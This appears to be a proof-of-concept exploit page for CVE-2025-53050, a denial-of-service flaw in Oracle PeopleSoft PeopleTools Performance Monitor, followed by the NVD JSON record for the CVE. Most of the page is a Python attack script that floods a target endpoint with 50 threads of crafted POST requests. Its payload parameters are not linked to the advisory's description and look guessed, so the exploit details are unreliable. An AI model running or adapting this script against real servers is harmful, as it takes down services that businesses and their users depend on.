CVE-2025-53050

# CVE-2025-53050 Oracle PeopleSoft PeopleTools Performance Monitor DoS PoC # This PoC demonstrates a Denial of Service attack against the Performance Monitor component # Affected versions: PeopleTools 8.60, 8.61, 8.62 import requests import threading import time TARGET_URL = "https://target-host:port/psp/ps/" # Performance Monitor servlet endpoint PM_ENDPOINT = "/psp/ps/?cmd=start&srtDef=psmon" def send_dos_request(target_url): """Send malicious HTTP request to trigger DoS in Performance Monitor""" headers = { "User-Agent": "Mozilla/5.0 (compatible; DoS-PoC)", "Content-Type": "application/x-www-form-urlencoded", "Accept": "*/*" } # Craft malicious payload targeting Performance Monitor payload = { "ICType": "13", # Performance Monitor type "ICXNum": "999999999", # Large value to cause resource exhaustion "MAXVAL": "2147483647", # Integer overflow trigger } try: response = requests.post( target_url + PM_ENDPOINT, headers=headers, data=payload, timeout=10, verify=False ) print(f"[+] Request sent - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request failed (possible DoS triggered): {e}") def exploit(target_url, thread_count=50): """Launch concurrent DoS attack against PeopleSoft Performance Monitor""" print(f"[*] Starting CVE-2025-53050 DoS attack against: {target_url}") threads = [] for i in range(thread_count): t = threading.Thread(target=send_dos_request, args=(target_url,)) threads.append(t) t.start() time.sleep(0.1) for t in threads: t.join() print("[*] Attack completed") if __name__ == "__main__": exploit(TARGET_URL)

{"cve": {"id": "CVE-2025-53050", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:42.970", "lastModified": "2025-10-23T16:06:57.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Performance Monitor). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of PeopleSoft Enterprise PeopleTools. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.60", "versionEndIncluding": "8.62", "matchCriteriaId": "9FDC7CAF-BD83-4D24-B199-0438570DDB47"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}